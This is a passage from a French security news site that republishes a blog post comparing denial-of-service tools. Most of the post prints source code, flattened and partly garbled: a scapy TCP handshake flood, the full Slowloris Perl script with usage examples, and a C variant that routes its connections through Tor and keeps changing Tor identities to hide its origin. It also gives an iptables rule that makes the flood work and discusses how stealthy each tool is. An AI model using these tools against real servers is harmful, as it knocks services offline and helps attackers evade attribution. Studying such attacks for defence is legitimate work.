Contribuez à SecuObs en envoyant des bitcoins ou des dogecoins.
Nouveaux articles (fr): 1pwnthhW21zdnQ5WucjmnF3pk9puT5fDF
Amélioration du site: 1hckU85orcGCm8A9hk67391LCy4ECGJca

Contribute to SecuObs by sending bitcoins or dogecoins.

Chercher :
Newsletter :  


Revues :
- Presse
- Presse FR
- Vidéos
- Twitter
- Secuobs





Sommaires :
- Tendances
- Failles
- Virus
- Concours
- Reportages
- Acteurs
- Outils
- Breves
- Infrastructures
- Livres
- Tutoriels
- Interviews
- Podcasts
- Communiques
- USBsploit
- Commentaires


Revue Presse:
- Tous
- Francophone
- Par mot clé
- Par site
- Le tagwall


Top bi-hebdo:
- Ensemble
- Articles
- Revue
- Videos
- Twitter
- Auteurs


Articles :
- Par mot clé
- Par auteur
- Par organisme
- Le tagwall


Videos :
- Toutes
- Par mot clé
- Par site
- Le tagwall


Twitter :
- Tous
- Par mot clé
- Par compte
- Le tagwall


Commentaires :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS/XML :
- Articles
- Commentaires
- Revue
- Revue FR
- Videos
- Twitter


RSS SecuObs :
- sécurité
- exploit
- windows
- attaque
- outil
- microsoft


RSS Revue :
- security
- microsoft
- windows
- hacker
- attack
- network


RSS Videos :
- curit
- security
- biomet
- metasploit
- biometric
- cking


RSS Twitter :
- security
- linux
- botnet
- attack
- metasploit
- cisco


RSS Comments :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS OPML :
- Français
- International











Revue de presse francophone :
- Appaloosa AppDome nouent un partenariat pour accompagner les entreprises dans le déploiement et la protection des applications mobiles
- D-Link offre une avec un routeur VPN sans fil AC
- 19 mai Paris Petit-Déjeuner Coreye Développer son business à l'abri des cyberattaques
- POYNTING PRESENTE LA NOUVELLE ANTENNE OMNI-291, SPECIALE MILIEU MARITIME, CÔTIER ET MILIEU HUMIDE
- Flexera Software Les utilisateurs français de PC progressent dans l'application de correctifs logiciels, mais des défis de tailles subsistent
- Riverbed lance SD-WAN basé sur le cloud
- Fujitsu multi-récompensé VMware lui décerne plusieurs Partner Innovation Awards à l'occasion du Partner Leadership Summit
- Zscaler Private Access sécuriser l'accès à distance en supprimant les risques inhérents aux réseaux privés virtuels
- QNAP annonce la sortie de QTS 4.2.1
- Une enquête réalisée par la société de cyber sécurité F-Secure a décelé des milliers de vulnérabilités graves, potentiellement utilisables par des cyber criminels pour infiltrer l'infrastru
- Trouver le juste équilibre entre une infrastructure dédiée et cloud le dilemme de la distribution numérique
- 3 juin - Fleurance - Cybersécurité Territoires
- Cyber-assurances Seules 40 pourcents des entreprises françaises sont couvertes contre les violations de sécurité et les pertes de données
- Des étudiants de l'ESIEA inventent CheckMyHTTPS un logiciel qui vérifie que vos connexions WEB sécurisées ne sont pas interceptées
- Les produits OmniSwitch d'Alcatel-Lucent Enterprise ALE gagnent en sécurité pour lutter contre les cyber-attaques modernes

Dernier articles de SecuObs :
- DIP, solution de partage d'informations automatisée
- Sqreen, protection applicative intelligente de nouvelle génération
- Renaud Bidou (Deny All): "L'innovation dans le domaine des WAFs s'oriente vers plus de bon sens et d'intelligence, plus de flexibilité et plus d'ergonomie"
- Mises à jour en perspective pour le système Vigik
- Les russes ont-ils pwn le système AEGIS ?
- Le ministère de l'intérieur censure une conférence au Canada
- Saut d'air gap, audit de firmware et (in)sécurité mobile au programme de Cansecwest 2014
- GCHQ: Le JTRIG torpille Anonymous qui torpille le JTRIG (ou pas)
- #FIC2014: Entrée en territoire inconnu
- Le Sénat investit dans les monnaies virtuelles

Revue de presse internationale :
- VEHICLE CYBERSECURITY DOT and Industry Have Efforts Under Way, but DOT Needs to Define Its Role in Responding to a Real-world Attack
- Demand letter served on poll body over disastrous Comeleak breach
- The Minimin Aims To Be The Simplest Theremin
- Hacking group PLATINUM used Windows own patching system against it
- Hacker With Victims in 100 Nations Gets 7 Years in Prison
- HPR2018 How to make Komboucha Tea
- Circuit Bender Artist bends Fresnel Lens for Art
- FBI Director Suggests iPhone Hacking Method May Remain Secret
- 2016 Hack Miami Conference May 13-15, 2016
- 8-bit Video Wall Made From 160 Gaming Keyboards
- In An Era Of Decline, News Sites Can t Afford Poor Web Performance
- BeautifulPeople.com experiences data breach 1m affected
- Swedish Air Space Infringed, Aircraft Not Required
- Why cybercriminals attack healthcare more than any other industry
- Setting the Benchmark in the Network Security Forensics Industry

Annuaire des videos
- FUZZING ON LINE PART THREE
- Official Maltego tutorial 5 Writing your own transforms
- Official Maltego tutorial 6 Integrating with SQL DBs
- Official Maltego tutorial 3 Importing CSVs spreadsheets
- install zeus botnet
- Eloy Magalhaes
- Official Maltego tutorial 1 Google s websites
- Official Maltego tutorial 4 Social Networks
- Blind String SQL Injection
- backdoor linux root from r57 php shell VPS khg crew redc00de
- How To Attaque Pc With Back Track 5 In Arabique
- RSA Todd Schomburg talks about Roundup Ready lines available in 2013
- Nessus Diagnostics Troubleshooting
- Panda Security Vidcast Panda GateDefender Performa Parte 2 de 2
- MultiPyInjector Shellcode Injection

Revue Twitter
- RT @fpalumbo: Cisco consistently leading the way ? buys vCider to boost its distributed cloud vision #CiscoONE
- @mckeay Looks odd... not much to go on (prob some slideshow/vid app under Linux)
- [SuggestedReading] Using the HTML5 Fullscreen API for Phishing Attacks
- RT @BrianHonan: Our problems are not technical but cultural. OWASP top 10 has not changed over the years @joshcorman #RSAC
- RT @mikko: Wow. Apple kernels actually have a function called PE_i_can_has_debugger:
- [Blog Spam] Metasploit and PowerShell payloads
- PinkiePie Strikes Again, Compromises Google Chrome in Pwnium Contest at Hack in the Box: For the second time thi...
- @mikko @fslabs y'all wldn't happen to have lat/long data sets for other botnets, wld you? Doing some research (free/open info rls when done)
- RT @nickhacks: Want to crash a remote host running Snow Leopard? Just use: nmap -P0 -6 --script=targets-ipv6-multicast-mld #wishiwaskidding
- An inexpensive proxy service called is actually a front for #malware distribution -

Mini-Tagwall
Revue de presse : security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone

+ de mots clés pour la revue de presse

Annuaires des videos : curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit

+ de mots clés pour les videos

Revue Twitter : security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall

+ de mots clés pour la revue Twitter

Top bi-hebdo des articles de SecuObs
- [Ettercap – Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing
- [Infratech - release] version 0.6 de Bluetooth Stack Smasher
- [IDS Snort Windows – Partie 2] Installation et configuration
- [Infratech - vulnérabilité] Nouvelle version 0.8 de Bluetooth Stack Smasher
- Mises à jour en perspective pour le système Vigik
- USBDumper 2 nouvelle version nouvelles fonctions !
- EFIPW récupère automatiquement le mot de passe BIOS EFI des Macbook Pro avec processeurs Intel
- La sécurité des clés USB mise à mal par USBDUMPER
- Une faille critique de Firefox expose les utilisateurs de Tor Browser Bundle
- Installation sécurisée d'Apache Openssl, Php4, Mysql, Mod_ssl, Mod_rewrite, Mod_perl , Mod_security

Top bi-hebdo de la revue de presse
- StackScrambler and the Tale of a Packet Parsing Bug

Top bi-hebdo de l'annuaire des videos
- DC++ Botnet. How To DDos A Hub With Fake IPs.
- Comment creer un server botnet!!!!(Réseau de pc zombies)
- Defcon 14 Hard Drive Recovery Part 3

Top bi-hebdo de la revue Twitter
- RT @secureideas: I believe that all the XSS flaws announced are fixed in CVS. Will test again tomorrow if so, release 1.4.3. #BASESnort
- Currently, we do not support 100% of the advanced PDF features found in Adobe Reader... At least that's a good idea.
- VPN (google): German Foreign Office Selects Orange Business for Terrestrial Wide: Full
- @DisK0nn3cT Not really, mostly permission issues/info leak...they've had a couple of XSS vulns but nothing direct.
- Swatting phreaker swatted and heading to jail: A 19-year-old American has been sentenced to eleven years in pris..
- RT @fjserna You are not a true hacker if the calc.exe payload is not the scientific one... infosuck.org/0x0035.png

Top des articles les plus commentés
- [Metasploit 2.x – Partie 1] Introduction et présentation
- Microsoft !Exploitable un nouvel outil gratuit pour aider les développeurs à évaluer automatiquement les risques
- Webshag, un outil d'audit de serveur web
- Les navigateurs internet, des mini-systèmes d’exploitation hors de contrôle ?
- Yellowsn0w un utilitaire de déblocage SIM pour le firmware 2.2 des Iphone 3G
- CAINE un Live[CD|USB] pour faciliter la recherche légale de preuves numériques de compromission
- Nessus 4.0 placé sous le signe de la performance, de l'unification et de la personnalisation
- [Renforcement des fonctions de sécurité du noyau Linux – Partie 1] Présentation
- [IDS Snort Windows – Partie 1] Introduction aux IDS et à SNORT
- Origami pour forger, analyser et manipuler des fichiers PDF malicieux

Secu DoS type Slowloris via TOR

Si vous voulez bloquer ce service sur vos fils RSS
Si vous voulez nous contacter ou nous proposer un fil RSS

Menu > Articles de la revue de presse : - l'ensemble [tous | francophone] - par mots clé [tous] - par site [tous] - le tagwall [voir] - Top bi-hebdo de la revue de presse [Voir]

S'abonner au fil RSS global de la revue de presse



Secu DoS type Slowloris via TOR

Par cloud's Blog
Le [2011-07-12] à 00:33:55



Présentation : J'ai récemment vu un post qui m'a intéressé sur Fulldisclosure parlant du soi-disant leak de l'outils de the j3st3r, XerXes. Le code de cet outils est recherché par certain car semble offrir de forte capacité de DoS. Meme si au final, ce n'est pas ce code, il est intéressant et présente une évolution de Slowloris. J'avais publié avant la publication de Slowloris un outils fonctionnant dans le meme esprit mais au final impactant plus d'applications car non focalisé sur les serveurs web. Je vais donc expliqué le fonctionnement du nouveau code publié et comparer les 3 outils. Pour ce qui est de mon code que j'avais nommé Tcp handshake flood , il réalise des TCP handshake avec le serveur cible sans enregistrer les sessions pour rester performant. Basé sur scapy, il envoie des SYN, lance un 2e thread qui sniff et répond aux SYN ACK pour établir une connexion et rester en attente ce qui surcharge le serveur distant. Du coup il fonctionne très bien sur les serveurs Apache mais également sur d'autres serveurs comme SSH. Il n'envoie aucun payload comme le fait slowloris et reste donc plus ouvert . Code de TCP Handshake Flood usr bin env python from scapy.all import import threading, sys import pprint try print TCP IP DoS HandShake Flood PoC by cloud http blog.madpowah.org hostname sys.argv 1 dport sys.argv 2 nbsyn int sys.argv 3 network sys.argv 4 except print Utilisation . handshake.py print Exemple . handshake.py 192.168.0.1 80 65000 eth0 sys.exit 1 def sendSyns print Sending SYN ... sport 6000 while sport Start sniff ... nbcount nbsyn 10 filterport port dport sniff iface network,filter filterport, prn lambda x getNumSeq x , count nbcount def getNumSeq packet if packet.getlayer 'TCP' is not None flag packet.getlayer 'TCP' .flags if flag 18 numseq packet.getlayer 'TCP' .ack numack packet.getlayer 'TCP' .seq 1 srcport packet.getlayer 'TCP' .dport send IP dst hostname,ttl 255 TCP flags A , sport srcport, dport int dport , seq numseq, ack numack , verbose 0 print ACK pourcentsd pourcents numseq t1 threading.Thread target startSniff, args t2 threading.Thread target sendSyns, args t1.start t2.start Le gros inconvénient est qu'il ne permet pas dans l'état de spoofer une adresse et on est donc fortement susceptible d'etre identifié et l'ip source peut facilement etre bloquée. Par ailleurs, il necessite de bloquer tous les paquets de type RST avant le lancement du script iptables -A OUTPUT -o eth0 -p tcp --tcp-flags RST RST -j DROP Slowloris est écrit en perl et crée de nombreux thread se connectant à un serveur web avec un payload puis ne fait plus rien pour laisser la socket ouverte et surcharger le serveur. Il est très efficace sur les serveurs web mais par exemple ne fait rien sur un serveur SSH si on ne modifie pas un peu le code. Par ailleurs il ne permet également pas de spoofer l'adresse source. Code de Slowloris usr bin perl -w use strict use IO Socket INET use IO Socket SSL use Getopt Long use Config SIG 'PIPE' 'IGNORE' Ignore broken pipe errors print shost, 'dns s' host, 'httpready' httpready, 'num i' connections, 'cache' cache, 'port i' port, 'https' ssl, 'tcpto i' tcpto, 'test' test, 'timeout i' timeout, 'version' version, if version print Version 0.7 n exit unless host print Usage n n tperl 0 -dns www.example.com -options n print n tType 'perldoc 0' for help with options. n n exit unless port port 80 print Defaulting to port 80. n unless tcpto tcpto 5 print Defaulting to a 5 second tcp connection timeout. n unless test unless timeout timeout 100 print Defaulting to a 100 second re-try timeout. n unless connections connections 1000 print Defaulting to 1000 connections. n my usemultithreading 0 if Config usethreads print Multithreading enabled. n usemultithreading 1 use threads use threads shared else print No multithreading capabilites found n print Slowloris will be slower than normal as a result. n my packetcount shared 0 my failed shared 0 my connectioncount shared 0 srand if cache if shost sendhost shost else sendhost host if httpready method POST else method GET if test my times 2 , 30 , 90 , 240 , 500 my totaltime 0 foreach times totaltime totaltime totaltime totaltime 60 print This test could take up to totaltime minutes. n my delay 0 my working 0 my sock if ssl if sock new IO Socket SSL PeerAddr host , PeerPort port , Timeout tcpto , Proto tcp , working 1 else if sock new IO Socket INET PeerAddr host , PeerPort port , Timeout tcpto , Proto tcp , working 1 if working if cache rand . int rand 99999999999999 else rand my primarypayload GET rand HTTP 1.1 r n . Host sendhost r n . User-Agent Mozilla 4.0 compatible MSIE 7.0 Windows NT 5.1 Trident 4.0 .NET CLR 1.1.4322 .NET CLR 2.0.503l3 .NET CLR 3.0.4506.2152 .NET CLR 3.5.30729 MSOffice 12 r n . Content-Length 42 r n if print sock primarypayload print Connection successful, now comes the waiting game... n else print That's odd - I connected but couldn't send the data to host port. n print Is something wrong nDying. n exit else print Uhm... I can't connect to host port. n print Is something wrong nDying. n exit for my i 0 i host , PeerPort port , Timeout tcpto , Proto tcp , working z 1 else working z 0 else if sock z new IO Socket INET PeerAddr host , PeerPort port , Timeout tcpto , Proto tcp , working z 1 packetcount packetcount 3 SYN, SYN ACK, ACK else working z 0 if working z 1 if cache rand . int rand 99999999999999 else rand my primarypayload method rand HTTP 1.1 r n . Host sendhost r n . User-Agent Mozilla 4.0 compatible MSIE 7.0 Windows NT 5.1 Trident 4.0 .NET CLR 1.1.4322 .NET CLR 2.0.503l3 .NET CLR 3.0.4506.2152 .NET CLR 3.5.30729 MSOffice 12 r n . Content-Length 42 r n my handle sock z if handle print handle primarypayload if SIG WARN__ working z 0 close handle failed failedconnections else packetcount working z 1 else working z 0 failed failedconnections else working z 0 failed failedconnections print t tSending data. n foreach my z 1 .. num if working z 1 if sock z my handle sock z if print handle X-a b r n working z 1 packetcount else working z 0 debugging info failed failedconnections else working z 0 debugging info failed failedconnections print Current stats tSlowloris has now sent packetcount packets successfully. nThis thread now sleeping for timeout seconds... n n sleep timeout sub domultithreading my num my thrs my i 0 my connectionsperthread 50 while i create doconnections, connectionsperthread, 1 i connectionsperthread my threadslist threads-list while threadslist 0 failed 0 __END__ head1 TITLE Slowloris head1 VERSION Version 0.7 Beta head1 DATE 06 17 2009 head1 AUTHOR RSnake with threading from John Kinsella head1 ABSTRACT Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time once the program is killed , and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons. head1 AFFECTS Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others... head1 NOT AFFECTED IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others... head1 DESCRIPTION Slowloris is designed so that a single machine probably a Linux UNIX machine since Windows appears to limit how many sockets you can have open at any given time can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well. As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood. head2 Testing If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing head3 Testing Example . slowloris.pl -dns www.example.com -port 80 -test This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the times array although I wouldn't suggest that unless you know what you're doing . head2 HTTP DoS Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries and associated bandwidth that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though. head3 HTTP DoS Example . slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 head2 HTTPReady Bypass HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch. head3 HTTPReady Bypass Example . slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready head2 Stealth Host DoS If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately. head3 Stealth Host DoS Example . slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com head2 HTTPS DoS Slowloris does support SSL TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary. head3 HTTPS DoS Example . slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https head2 HTTP Cache Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary. head3 HTTP Cache Example . slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache head1 Issues Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation. They may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested. Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets although far far less than a typical GET request flooder . So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture. For some reason Slowloris works way better if run from a Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than 130 or so on any server you test - you're probably running into this feature of modern operating systems. Either way, this program seems to work best if run from FreeBSD. Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 Bad Request errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too. head1 What is a slow loris What exactly is a slow loris It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out http www.youtube.com watch v rLdQ3UhLoD4 SanguineRose William Welna a donc eu l'idée de partir sur une attaque de type Slowloris mais en envoyant un payload générique 0x00 et en utilisant des tunnels TOR qu'il va changer durant l'attaque. Ainsi l'adresse source est spoofée et en plus change plusieurs fois durant l'attaque ce qui simule presque un DDoS avec une seule machine. Par ailleurs il reste assez générique comme Tcp Handshake Flood et permet d'etre efficace sur un serveur autre que web. Par contre il est beaucoup moins efficace que slowloris sur du web, cela dépend probablement du chemin du tunnel TOR qui sera emprunté. De plus on constate en sniffant le traffic que les ip source varient mais peu, c'est à dire environ toutes les 15-20s ce qui est trop faible pour simuler vraiment un DDoS. Il est par contre également efficace contre un serveur SSH très rapidement. Code de Slowloris with a twist over tor - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Slowloris with a twist over tor - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Due to the alpha version of this code being leaked I've decided to release an improved version to fully show this method of attack mostly free of the bugs dependency on torsocks. This attack works on a similar idea of slowloris only it sends packets containing a single 0x00 and optionally nothing causing Apache to keep the connection alive almost indefinitely. Due to no one knowing how th3j35t3r's XerXes works I can not say if this is the same method. This was one of my many ideas I was exploring as to how it could possibly work that has some successful results. - SanguineRose William Welna Leaked Version http seclists.org fulldisclosure 2011 Jul 84 include include include include include include include include include include include include Re-connecting to tor sometimes takes a while, in order for this to be effective it requires mass amounts of threads handling only a few connections each, since this is a POC I will leave it up to others to fix that. It also has limited success attack lengths due to tor being slow define CONNECTIONS 3 define THREADS 148 typedef struct const char host, port thread_args Simple debug function void dump_array char name, char data, int size int x, z, indent strlen name 2 fprintf stderr, pourcentss , name for x 0 x ai_next if sock socket p-ai_family, p-ai_socktype, p-ai_protocol -1 continue setsockopt sock, SOL_SOCKET, SO_REUSEADDR, y, 4 if connect sock, p-ai_addr, p-ai_addrlen -1 close sock continue break if p NULL if servinfo freeaddrinfo servinfo return -2 if servinfo freeaddrinfo servinfo return sock Opens SOCKS5 connection to tor I also dedicate this function to pr0f host, a-port fprintf stderr, Socket Returned pourcentsi n , socks x if write socks x , 0 , 1 host, a-port usleep 100000 void do_help char n fprintf stderr, Usage pourcentss n exit 0 void cycle_identity int sock make_socket localhost , 9051 char shit_bucket calloc 1024, sizeof char if sock signal NEWNYM n read sock, shit_bucket, 1024 sleep 5 int main int argc, char argv pthread_t threads THREADS pthread_t cycle_tid thread_args arg void status int x if argc 3 do_help argv 0 arg.host const char argv 1 arg.port const char argv 2 pthread_create cycle_tid, NULL, cycle_identity, NULL for x 0 x THREADS x pthread_create threads x , NULL, attack, usleep 200000 for x 0 x THREADS x pthread_join threads x , pthread_kill cycle_tid, 15 pthread_exit NULL return 0 Il n'existe donc pas encore d'attaque de type DoS parfaite mais le choix de l'outil dépend de l'objectif et du niveau de discrétion souhaité. On pourrait également imaginé un cumul des méthodes pour augmenter l'efficacité et noyer notre IP parmi d'autres. Je pense que l'ajout d'une règle de firewall comme je l'avais indiqué dans mon précédent article devrait toujours empecher toutes ces attaques d'aboutir.




AddThis Social Bookmark Widget



Les derniers articles du site "cloud's Blog" :

- Tool ForensicPCAP, un outil d'analyse de PCAP en python
- Secu Blocage compte avec Pwpolicy sous MacOSX
- Tuto Changement de lecteur PDF avec Cuckoo
- Tuto Probleme installation Cobradroid
- Bug Correction bug Browse Cuckoo
- Humour Blague geek sur Viadeo
- Root sur VeraLite sans authentification
- Root SSH sur box VeraLite
- WTF Euromillion et la s
- PHP Strcmp bypass




S'abonner au fil RSS global de la revue de presse

Menu > Articles de la revue de presse : - l'ensemble [tous | francophone] - par mots clé [tous] - par site [tous] - le tagwall [voir] - Top bi-hebdo de la revue de presse [Voir]



Si vous voulez bloquer ce service sur vos fils RSS :
- avec iptables "iptables -A INPUT -s 88.190.17.190 --dport 80 -j DROP"
- avec ipfw et wipfw "ipfw add deny from 88.190.17.190 to any 80"
- Nous contacter par mail




SecuToolBox :

Mini-Tagwall des articles publiés sur SecuObs :

Mini-Tagwall de l'annuaire video :

Mini-Tagwall des articles de la revue de presse :

Mini-Tagwall des Tweets de la revue Twitter :